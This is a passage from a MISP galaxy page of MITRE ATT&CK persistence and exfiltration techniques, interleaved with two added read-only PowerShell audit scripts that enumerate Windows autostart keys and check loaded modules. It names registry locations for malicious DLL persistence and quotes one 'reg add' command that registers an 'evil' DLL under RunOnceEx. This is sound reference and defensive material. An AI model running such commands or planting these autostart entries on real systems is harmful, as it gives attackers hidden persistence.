Adversaries may use traffic duplication in conjunction with Network Sniffing, Input Capture, or Adversary-in-the-Middle depending on the goals and objectives of the adversary.

Internal MISP references

UUID c2fc2776-e674-46ff-8b8d-ecc90b8b1c26 which can be used as a unique global reference for Traffic Duplication in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1020.001
Related clusters

To see the related clusters, click here.

Automated Exfiltration

Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection.

When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as Exfiltration Over C2 Channel and Exfiltration Over Alternative Protocol.

Internal MISP references

UUID 26abc19f-5968-45f1-aa1f-f35863a2f804 which can be used as a unique global reference for Automated Exfiltration in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Network', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

BITS Jobs

Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through Component Object Model (COM).[Microsoft COM][Microsoft BITS] BITS is commonly used by updaters, messengers, and other applications that prefer to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.

The interface to create and manage BITS jobs is accessible through PowerShell and the BITSAdmin tool.[Microsoft BITS][Microsoft BITSAdmin]

Adversaries may abuse BITS to download (e.g. Ingress Tool Transfer), execute, and even clean up after running malicious code (e.g. Indicator Removal). BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.[CTU BITS Malware June 2016][Mondok Windows PiggyBack BITS May 2007][Symantec BITS May 2007] BITS-enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).[PaloAlto UBoatRAT Nov 2017][CTU BITS Malware June 2016]

BITS upload functionalities can also be used to perform Exfiltration Over Alternative Protocol.[CTU BITS Malware June 2016]

Internal MISP references

UUID 6b278e5d-7383-42a4-9425-2da79bbe43e0 which can be used as a unique global reference for BITS Jobs in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Active Setup

Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.[Klein Active Setup 2010] These programs will be executed under the context of the user and will have the account's associated permissions level.

Adversaries may abuse Active Setup by creating a key under HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\ and setting a malicious value for StubPath. This value will serve as the program that will be executed when a user logs into the computer.[Mandiant Glyer APT 2010][Citizenlab Packrat 2015][FireEye CFR Watering Hole 2012][SECURELIST Bright Star 2015][paloalto Tropic Trooper 2016]

Adversaries can abuse these components to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use Masquerading to make the Registry entries look as if they are associated with legitimate programs.

Internal MISP references

UUID 8bd564d2-a3f1-4367-8631-a2d2cb3a1f46 which can be used as a unique global reference for Active Setup in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1547.014
Related clusters

To see the related clusters, click here.

Authentication Package

Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.[MSDN Authentication Packages]

Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ with the key value of "Authentication Packages"=<target binary>. The binary will then be executed by the system when the authentication packages are loaded.

Internal MISP references

UUID 7ede5868-1109-4f22-abc7-9495658f7866 which can be used as a unique global reference for Authentication Package in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1547.002
Related clusters

To see the related clusters, click here.

Kernel Modules and Extensions

Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.[Linux Kernel Programming] 

When used maliciously, LKMs can be a type of kernel-mode Rootkit that runs with the highest operating system privilege (Ring 0).[Linux Kernel Module Programming Guide] Common features of LKM-based rootkits include hiding the rootkit itself; selective hiding of files, processes, and network activity; log tampering; providing authenticated backdoors; and enabling root access to non-privileged users.[iDefense Rootkit Overview]

Kernel extensions, also called kexts, are used in macOS to load functionality onto a system in a way similar to LKMs for Linux. Since the kernel is responsible for enforcing security and kernel extensions run as part of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through the kextload and kextunload commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign kernel extensions. Developers without these privileges may still sign kexts, but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.[System and kernel extensions in macOS]

Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.[Apple Kernel Extension Deprecation]

Adversaries can use LKMs and kexts to conduct Persistence and/or Privilege Escalation on a system. Examples have been found in the wild, and there are some relevant open source projects as well.[Volatility Phalanx2][CrowdStrike Linux Rootkit][GitHub Reptile][GitHub Diamorphine][RSAC 2015 San Francisco Patrick Wardle][Synack Secure Kernel Extension Broken][Securelist Ventir][Trend Micro Skidmap]

Internal MISP references

UUID 74e2b24b-3bf7-4361-bc07-983bffe674f7 which can be used as a unique global reference for Kernel Modules and Extensions in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1547.006
Related clusters

To see the related clusters, click here.

Login Items

Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.[Open Login Items Apple] Login items can be added via a shared file list or Service Management Framework.[Adding Login Items] Shared file list login items can be set using scripting languages such as AppleScript, whereas the Service Management Framework uses the API call SMLoginItemSetEnabled.

Login items installed using the Service Management Framework leverage launchd, are not visible in the System Preferences, and can only be removed by the application that created them.[Adding Login Items][SMLoginItemSetEnabled Schroeder 2013] Login items created using a shared file list are visible in System Preferences, can hide the application when it launches, and are executed through LaunchServices, not launchd, to open applications, documents, or URLs without using Finder.[Launch Services Apple Developer] Users and applications use login items to configure their user environment to launch commonly used services or applications, such as email, chat, and music applications.

Adversaries can utilize AppleScript and Native API calls to create a login item to spawn malicious executables.[ELC Running at startup] Prior to version 10.5 on macOS, adversaries can add login items by using AppleScript to send Apple events to the “System Events” process, which has an AppleScript dictionary for manipulating login items.[Login Items AE] Adversaries can use a command such as tell application “System Events” to make login item at end with properties /path/to/executable.[Startup Items Eclectic][hexed osx.dok analysis 2019][Add List Remove Login Items Apple Script] This command adds the path of the malicious executable to the login item file list located in ~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm.[Startup Items Eclectic] Adversaries can also use login items to launch executables that can be used to control the victim system remotely or as a means to gain privilege escalation by prompting for user credentials.[objsee mac malware 2017][CheckPoint Dok][objsee netwire backdoor 2019]

Internal MISP references

UUID 6556e1cb-87d0-4e67-9d5c-343d1eddf430 which can be used as unique global reference for Login Items in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1547.015
Related clusters

To see the related clusters, click here.

LSASS Driver

Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.[Microsoft Security Subsystem]

Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., Hijack Execution Flow), an adversary can use LSA operations to continuously execute malicious payloads.

Internal MISP references

UUID bce86020-2851-4b01-97a9-e51a6b23ea68 which can be used as unique global reference for LSASS Driver in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1547.008
Related clusters

To see the related clusters, click here.

Port Monitors

Adversaries may use port monitors to run an adversary-supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.[AddMonitor] This DLL can be located in C:\Windows\System32 and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions.[Bloxham] Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors.

The Registry key contains entries for the following:

  • Local Port
  • Standard TCP/IP Port
  • USB Monitor
  • WSD Port

Adversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM.

Internal MISP references

UUID ffd9430b-c727-47f4-a1f0-b1d4f8c29740 which can be used as unique global reference for Port Monitors in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1547.010
Related clusters

To see the related clusters, click here.

Print Processors

Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation. Print processors are DLLs that are loaded by the print spooler service, spoolsv.exe, during boot.[Microsoft Intro Print Processors]

Adversaries may abuse the print spooler service by adding print processors that load malicious DLLs at startup. A print processor can be installed through the AddPrintProcessor API call with an account that has SeLoadDriverPrivilege enabled. Alternatively, a print processor can be registered to the print spooler service by adding the HKLM\SYSTEM\[CurrentControlSet or ControlSet001]\Control\Print\Environments\[Windows architecture: e.g., Windows x64]\Print Processors\[user defined]\Driver Registry key that points to the DLL.

For the malicious print processor to be correctly installed, the payload must be located in the dedicated system print-processor directory, which can be found with the GetPrintProcessorDirectory API call, or referenced via a relative path from this directory.[Microsoft AddPrintProcessor May 2018] After the print processors are installed, the print spooler service, which starts during boot, must be restarted in order for them to run.[ESET PipeMon May 2020]

The print spooler service runs under SYSTEM level permissions, therefore print processors installed by an adversary may run under elevated privileges.

Internal MISP references

UUID f7544b99-d596-43dd-ab12-3844756f3ad7 which can be used as unique global reference for Print Processors in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1547.012
Related clusters

To see the related clusters, click here.

Registry Run Keys / Startup Folder

Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.[Microsoft Run Key] These programs will be executed under the context of the user and will have the account's associated permissions level.

The following run keys are created by default on Windows systems:

  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce

Run keys may exist under multiple hives.[Microsoft Wow6432Node 2018][Malwarebytes Wow6432Node 2016] The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx key is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency.[Microsoft Run Key] For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll" [Oddvar Moe RunOnceEx Mar 2018]

Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup. The startup folder path for all users is C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp.

The following Registry keys can be used to set startup folder items for persistence:

  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders

The following Registry keys can control automatic startup of services during boot:

  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices

Using policy settings to specify startup programs creates corresponding values in either of two Registry keys:

  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run

Programs listed in the load value of the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows run automatically for the currently logged-on user.

By default, the multistring BootExecute value of the registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.

Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use Masquerading to make the Registry entries look as if they are associated with legitimate programs.
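A read-only audit of the autostart locations named above, added here as an example (it is not part of the MISP galaxy page or of MITRE's tooling). The default values in $ExpectedDefaults are an assumption for current Windows 10/11 builds and should be replaced with your own baseline.

```powershell
# Added example: enumerate the run keys, RunOnceEx subkeys (including Depend values),
# startup folders and fixed-default values from the description, so that anything an
# adversary placed there can be reviewed. Nothing is modified.

$RunKeys = @(
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnceEx',
    'HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunServices',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunServices',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce'
)

function Get-RunKeyEntries {
    # Every value under each run key, recursing so that RunOnceEx\0001 and its Depend
    # subkey (the DLL-loading form shown in the description) are included.
    param([string[]]$Keys)
    foreach ($path in $Keys) {
        if (-not (Test-Path -Path $path)) { continue }
        $keys = @(Get-Item -Path $path) + @(Get-ChildItem -Path $path -Recurse -ErrorAction SilentlyContinue)
        foreach ($k in $keys) {
            foreach ($name in $k.GetValueNames()) {
                [pscustomobject]@{
                    Location = $k.Name
                    Value    = $(if ($name -eq '') { '(Default)' } else { $name })
                    Data     = $k.GetValue($name)
                }
            }
        }
    }
}

function Get-StartupFolderItems {
    # Both startup folders from the description; desktop.ini is the only file expected by default.
    $folders = @(
        (Join-Path -Path $env:APPDATA -ChildPath 'Microsoft\Windows\Start Menu\Programs\Startup'),
        (Join-Path -Path $env:ProgramData -ChildPath 'Microsoft\Windows\Start Menu\Programs\StartUp')
    )
    foreach ($dir in $folders) {
        if (-not (Test-Path -Path $dir)) { continue }
        Get-ChildItem -Path $dir -Force -File | Where-Object { $_.Name -ne 'desktop.ini' } | ForEach-Object {
            [pscustomobject]@{ Location = $dir; Item = $_.Name; Modified = $_.LastWriteTime }
        }
    }
}

# Values that normally hold a fixed default ("key|value" = expected data). These defaults
# are an assumption; any change to them is the signal, so compare against your baseline.
$ExpectedDefaults = @{}
$ExpectedDefaults['HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager|BootExecute'] = 'autocheck autochk *'
$ExpectedDefaults['HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Windows|load'] = ''
$ExpectedDefaults['HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders|Startup'] = '%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'
$ExpectedDefaults['HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders|Common Startup'] = '%ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup'

function Test-ExpectedDefault {
    # Reads the raw data (no %VAR% expansion) so a redirected Startup folder is seen as typed.
    param([string]$Path, [string]$Name, [string]$Expected)
    if (-not (Test-Path -Path $Path)) { return }
    $raw = (Get-Item -Path $Path).GetValue($Name, '', 'DoNotExpandEnvironmentNames')
    if ($raw -is [array]) { $raw = $raw -join ' ' }   # BootExecute is REG_MULTI_SZ
    [pscustomobject]@{ Location = "$Path\$Name"; Data = $raw; IsDefault = ($raw -eq $Expected) }
}

Write-Output '== Run key values =='
Get-RunKeyEntries -Keys $RunKeys | Format-Table -AutoSize
Write-Output '== Startup folder contents =='
Get-StartupFolderItems | Format-Table -AutoSize
Write-Output '== Fixed-default values (IsDefault False means the value was changed) =='
$ExpectedDefaults.GetEnumerator() | ForEach-Object {
    $path, $name = $_.Key -split '\|', 2
    Test-ExpectedDefault -Path $path -Name $name -Expected $_.Value
} | Format-Table -AutoSize
```

Run it from an elevated prompt so the HKLM keys and the all-users startup folder are readable; the HKCU results describe only the account running the script.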

Internal MISP references

UUID 0ca28cc0-89d0-4680-baef-94d7202c6a9b which can be used as unique global reference for Registry Run Keys / Startup Folder in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1547.001
Related clusters

To see the related clusters, click here.

Re-opened Applications

Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".[Re-Open windows on Mac] When selected, all applications currently open are added to a property list file named com.apple.loginwindow.[UUID].plist within the ~/Library/Preferences/ByHost directory.[Methods of Mac Malware Persistence][Wardle Persistence Chapter] Applications listed in this file are automatically reopened upon the user’s next logon.

Adversaries can establish Persistence by adding a malicious application path to the com.apple.loginwindow.[UUID].plist file to execute payloads when a user logs in.

Internal MISP references

UUID 9459a27a-b892-4864-9916-814130bea485 which can be used as unique global reference for Re-opened Applications in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1547.007
Related clusters

To see the related clusters, click here.

Security Support Provider

Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.

The SSP configuration is stored in two Registry keys: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages and HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.[Graeber 2014]

Internal MISP references

UUID 8a6ec54e-c7cd-4e3c-b848-21f8be2f864a which can be used as unique global reference for Security Support Provider in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1547.005
Related clusters

To see the related clusters, click here.

Shortcut Modification

Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.

Adversaries may abuse shortcuts in the startup folder to execute their tools and achieve persistence.[Shortcut for Persistence] Although often used as payloads in an infection chain (e.g. Spearphishing Attachment), adversaries may also create a new shortcut as a means of indirection, while also abusing Masquerading to make the malicious shortcut appear as a legitimate program. Adversaries can also edit the target path or entirely replace an existing shortcut so their malware will be executed instead of the intended legitimate program.

Shortcuts can also be abused to establish persistence by implementing other methods. For example, LNK browser extensions may be modified (e.g. Browser Extensions) to persistently launch malware.

Internal MISP references

UUID bfde0a09-8109-41e4-b8c9-68fe20e8131b which can be used as unique global reference for Shortcut Modification in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1547.009
Related clusters

To see the related clusters, click here.

Time Providers

Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains.[Microsoft W32Time Feb 2018] W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients.[Microsoft TimeProvider]

Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\.[Microsoft TimeProvider] The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed.[Microsoft TimeProvider]

Adversaries may abuse this architecture to establish persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in the context of the Local Service account.[Github W32Time Oct 2017]

Internal MISP references

UUID 2e8cd9a0-846f-416b-80ba-21a15019ce73 which can be used as unique global reference for Time Providers in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1547.003
Related clusters

To see the related clusters, click here.

Winlogon Helper DLL

Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\Software[\Wow6432Node\]\Microsoft\Windows NT\CurrentVersion\Winlogon\ and HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ are used to manage additional helper programs and functionalities that support Winlogon.[Cylance Reg Persistence Sept 2013]

Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys are known to be susceptible to abuse:[Cylance Reg Persistence Sept 2013]

  • Winlogon\Notify - points to notification package DLLs that handle Winlogon events
  • Winlogon\Userinit - points to userinit.exe, the user initialization program executed when a user logs on
  • Winlogon\Shell - points to explorer.exe, the system shell executed when a user logs on

Adversaries may take advantage of these features to repeatedly execute malicious code and establish persistence.
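The Port Monitors, Print Processors, Security Support Provider, Time Providers and Winlogon Helper DLL entries above all describe a Registry value that names a module to be loaded at boot or logon. The following read-only audit, added here as an example and not part of the MISP galaxy page or of MITRE's tooling, walks those locations, resolves each configured module to a file and reports its Authenticode status; the print-processor directory names it uses are an assumption for x64 and x86 environments.

```powershell
# Added example: list every module registered under the load points described above and
# report whether it exists and is signed, so a missing, unsigned or unexpectedly located
# DLL/EXE stands out for review. Nothing is modified.

function Resolve-ModulePath {
    param([string]$Token, [string]$BaseDir = "$env:SystemRoot\System32")
    $p = [Environment]::ExpandEnvironmentVariables($Token.Trim().Trim('"'))
    if ($p -notmatch '\.(exe|dll)$') { $p += '.dll' }   # SSP names are stored without ".dll"
    if ([IO.Path]::IsPathRooted($p)) { return $p }
    # Bare names are searched where the loader would look: the given base dir, then
    # %SystemRoot% (explorer.exe, the default Winlogon shell, lives there, not in System32).
    foreach ($dir in @($BaseDir, $env:SystemRoot)) {
        $full = Join-Path -Path $dir -ChildPath $p
        if (Test-Path -Path $full -PathType Leaf) { return $full }
    }
    return (Join-Path -Path $BaseDir -ChildPath $p)
}

function Get-LoadPointRecord {
    # One record per comma-separated entry: Winlogon\Userinit is a comma-separated list
    # ("C:\Windows\system32\userinit.exe,"), and an appended second entry is a classic
    # persistence modification, so every entry is reported rather than only the first.
    param([string]$Source, [string]$Raw, [string]$BaseDir = "$env:SystemRoot\System32")
    foreach ($tok in ($Raw -split ',')) {
        if ($tok.Trim() -eq '') { continue }
        $path = Resolve-ModulePath -Token $tok -BaseDir $BaseDir
        $status = if (Test-Path -Path $path -PathType Leaf) {
            (Get-AuthenticodeSignature -FilePath $path).Status
        } else { 'Missing' }
        [pscustomobject]@{ Source = $Source; Configured = $tok.Trim(); Resolved = $path; Signature = $status }
    }
}

function Get-SubkeyValue {
    # (subkey name, data) pairs for one named value under each child key of $Path.
    param([string]$Path, [string]$ValueName)
    Get-ChildItem -Path $Path -ErrorAction SilentlyContinue | ForEach-Object {
        $data = $_.GetValue($ValueName)
        if ($data) { [pscustomobject]@{ Name = $_.PSChildName; Data = $data } }
    }
}

function Get-BootLoadPoints {
    # Port Monitors (T1547.010): <Monitors>\<name>\Driver names a DLL loaded by spoolsv.exe.
    foreach ($m in Get-SubkeyValue 'HKLM:\SYSTEM\CurrentControlSet\Control\Print\Monitors' 'Driver') {
        Get-LoadPointRecord -Source "PortMonitor\$($m.Name)" -Raw $m.Data
    }
    # Print Processors (T1547.012): Driver is relative to the per-architecture print processor
    # directory; the directory names below are an assumption for x64 and x86 environments.
    $ppDirs = @{ 'Windows x64' = 'x64'; 'Windows NT x86' = 'w32x86' }
    foreach ($arch in $ppDirs.Keys) {
        $base = "$env:SystemRoot\System32\spool\prtprocs\$($ppDirs[$arch])"
        $key = "HKLM:\SYSTEM\CurrentControlSet\Control\Print\Environments\$arch\Print Processors"
        foreach ($pp in Get-SubkeyValue $key 'Driver') {
            Get-LoadPointRecord -Source "PrintProcessor\$arch\$($pp.Name)" -Raw $pp.Data -BaseDir $base
        }
    }
    # Security Support Providers (T1547.005): REG_MULTI_SZ package lists in two Lsa keys.
    foreach ($lsa in 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa', 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig') {
        $k = Get-Item -Path $lsa -ErrorAction SilentlyContinue
        if (-not $k) { continue }
        foreach ($pkg in @($k.GetValue('Security Packages'))) {
            if ($pkg) { Get-LoadPointRecord -Source "SSP\$($lsa.Split('\')[-1])" -Raw $pkg }
        }
    }
    # Time Providers (T1547.003): each subkey carries DllName and an Enabled flag.
    foreach ($tp in Get-ChildItem 'HKLM:\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders' -ErrorAction SilentlyContinue) {
        $dll = $tp.GetValue('DllName')
        if ($dll) { Get-LoadPointRecord -Source "TimeProvider\$($tp.PSChildName) Enabled=$($tp.GetValue('Enabled'))" -Raw $dll }
    }
    # Winlogon (T1547.004): Userinit and Shell values plus any Notify package subkeys.
    foreach ($wl in 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon', 'HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon') {
        $k = Get-Item -Path $wl -ErrorAction SilentlyContinue
        if (-not $k) { continue }
        foreach ($v in 'Userinit', 'Shell') {
            $data = $k.GetValue($v)
            if ($data) { Get-LoadPointRecord -Source "Winlogon\$v ($($wl.Split(':')[0]))" -Raw $data }
        }
        foreach ($n in Get-SubkeyValue "$wl\Notify" 'DllName') {
            Get-LoadPointRecord -Source "Winlogon\Notify\$($n.Name)" -Raw $n.Data
        }
    }
}

Get-BootLoadPoints | Sort-Object Signature | Format-Table -AutoSize
```

Treat a NotSigned or Missing result as a prompt to compare the file against a known-good baseline rather than as proof of tampering, and note that the HKCU Winlogon values cover only the account running the script.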

Internal MISP references

UUID 6f42559d-fb54-4c82-9ea7-eb9c709dac07 which can be used as unique global reference for Winlogon Helper DLL in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1547.004
Related clusters

To see the related clusters, click here.

XDG Autostart Entries

Adversaries may add or modify XDG Autostart Entries to execute malicious programs or commands when a user’s desktop environment is loaded at login. XDG Autostart entries are available for any XDG-compliant Linux system. XDG Autostart entries use Desktop Entry files (.desktop) to configure the user’s desktop environment upon user login. These configuration files determine what applications launch upon user login, define associated applications to open specific file types, and define applications used to open removable media.[Free Desktop Application Autostart Feb 2006][Free Desktop Entry Keys]

Adversaries may abuse this feature to establish persistence by adding a path to a malicious binary or command to the Exec directive in the .desktop configuration file. When the user’s desktop environment is loaded at user login, the .desktop files located in the XDG Autostart directories are automatically executed. System-wide Autostart entries are located in the /etc/xdg/autostart directory while the user entries are located in the ~/.config/autostart directory.

Adversaries may combine this technique with Masquerading to blend malicious Autostart entries with legitimate programs.[Red Canary Netwire Linux 2022]

Internal MISP references

UUID 45f107b6-ae8e-49d7-a3fc-ea6437fbac76 which can be used as unique global reference for XDG Autostart Entries in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1547.013
Related clusters

To see the related clusters, click here.

Boot or Logon Autostart Execution

Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.[Microsoft Run Key][MSDN Authentication Packages][Microsoft TimeProvider][Cylance Reg Persistence Sept 2013][Linux Kernel Programming] These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.

Since some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges.

Internal MISP references

UUID 17b97c19-b986-4653-850a-44aee9aaaba1 which can be used as unique global reference for Boot or Logon Autostart Execution in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Login Hook

